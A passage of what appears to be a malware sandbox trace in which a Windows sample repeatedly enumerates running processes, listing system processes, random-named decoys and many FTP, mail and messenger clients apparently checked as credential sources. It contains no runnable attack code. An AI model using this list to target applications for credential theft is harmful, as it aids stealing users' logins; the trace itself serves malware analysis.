pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0206.754] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.755] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.757] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0206.759] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.761] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0206.763] CloseHandle (hObject=0x20fc) returned 1 [0206.763] Sleep (dwMilliseconds=0x64) [0206.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20a4 [0206.886] Process32First (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.888] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.890] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.891] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.893] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.895] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.897] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.898] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.901] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.903] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.905] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.907] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.972] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.974] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.976] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.978] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.979] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.982] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.984] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.986] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.988] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.989] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.991] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0206.993] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.994] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0206.996] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0206.998] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0206.999] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0207.001] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0207.002] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0207.004] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.006] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.008] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0207.046] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.048] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.050] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.052] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.070] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.074] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0207.076] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0207.078] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0207.079] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0207.081] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0207.083] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0207.085] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0207.086] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0207.088] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0207.090] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0207.092] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0207.093] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0207.095] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0207.101] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0207.104] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0207.106] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0207.108] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0207.110] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0207.112] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0207.114] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0207.140] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0207.142] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0207.144] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0207.148] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0207.150] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0207.152] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0207.154] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0207.156] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0207.158] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0207.161] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0207.166] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0207.168] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0207.172] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0207.174] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0207.176] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0207.178] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0207.180] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0207.182] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0207.184] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0207.186] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0207.188] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 